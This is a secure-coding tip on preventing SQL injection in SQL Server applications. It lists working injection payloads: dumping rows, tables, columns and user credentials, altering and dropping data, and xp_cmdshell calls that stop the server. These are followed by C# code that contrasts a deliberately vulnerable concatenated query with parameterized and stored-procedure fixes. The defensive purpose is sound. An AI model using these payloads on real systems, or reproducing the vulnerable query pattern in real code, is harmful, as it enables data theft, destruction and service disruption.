How to prevent SQL Injection
Example inputs that will succeed if your application builds its SQL by concatenating a plain query string with user input.
Fetch all rows:
    x' or 't'='t' --
Discover all tables:
    ' union select 0, id, name,0,0,0,0,0,0,0 from sysobjects where xtype = 'U' --
Discover all columns:
    ' union select 0, name,1,0,0,0,0,0,0,0 from syscolumns --
Steal DB users:
    ' union select 0, uid, name, password, roles, 0,0,0,0,0,0,0 from sysusers --
Change a phone number:
    888-88-8888'; update authors set phone = '111-11-1111' --
Drop a table:
    888-88-8888'; drop table discounts --
Disconnect or bring SQL Server down:
    888-88-8888; exec master..xp_cmdshell 'ipconfig /release'
(note: this depends on the version of SQL Server you have; it only works if the server permits it)
Or to stop SQL Server:
    888-88-8888; exec master..xp_cmdshell 'net stop sqlserver'
To prevent all of these, do one of three things:
1- Use parameterized queries: pass each value as a SqlParameter added to the command's Parameters collection instead of concatenating it into the SQL text.
2- Use stored procedures.
3- Use LINQ.
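As an added example (not from the original post), here is the concatenated query that the inputs above break, next to the same lookup done with SqlParameter and with a stored procedure. It assumes the pubs sample "authors" table with an au_id column and a hypothetical procedure named dbo.usp_UpdateAuthorPhone.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Assumed schema: the pubs sample table "authors" (au_id varchar(11), au_lname, phone).
public static class AuthorLookup
{
    // VULNERABLE: the user-supplied id is concatenated into the SQL text, so an input
    // such as  x' or 't'='t' --  rewrites the WHERE clause and returns every row.
    public static DataTable FindByIdVulnerable(SqlConnection conn, string authorId)
    {
        string sql = "SELECT au_id, au_lname, phone FROM authors WHERE au_id = '" + authorId + "'";
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    // FIXED (option 1): parameterized query. The SQL text never changes; the value is sent
    // separately as a typed parameter, so quotes and "--" inside it are data, not SQL.
    public static DataTable FindByIdSafe(SqlConnection conn, string authorId)
    {
        const string sql = "SELECT au_id, au_lname, phone FROM authors WHERE au_id = @au_id";
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            // Declare the SQL type and length explicitly; the driver enforces both.
            cmd.Parameters.Add(new SqlParameter("@au_id", SqlDbType.VarChar, 11) { Value = authorId });
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    // FIXED (option 2): stored procedure (hypothetical name), still invoked with parameters.
    // Caveat: a procedure that builds dynamic SQL from its arguments is just as injectable.
    public static int UpdatePhoneViaProc(SqlConnection conn, string authorId, string phone)
    {
        using (var cmd = new SqlCommand("dbo.usp_UpdateAuthorPhone", conn))
        {
            cmd.CommandType = CommandType.StoredProcedure;
            cmd.Parameters.Add("@au_id", SqlDbType.VarChar, 11).Value = authorId;
            cmd.Parameters.Add("@phone", SqlDbType.Char, 12).Value = phone;
            return cmd.ExecuteNonQuery(); // rows affected
        }
    }
}
```

With the parameterized version, the "fetch all" input simply matches no author, and the "; drop table" inputs are looked up as literal au_id values rather than executed.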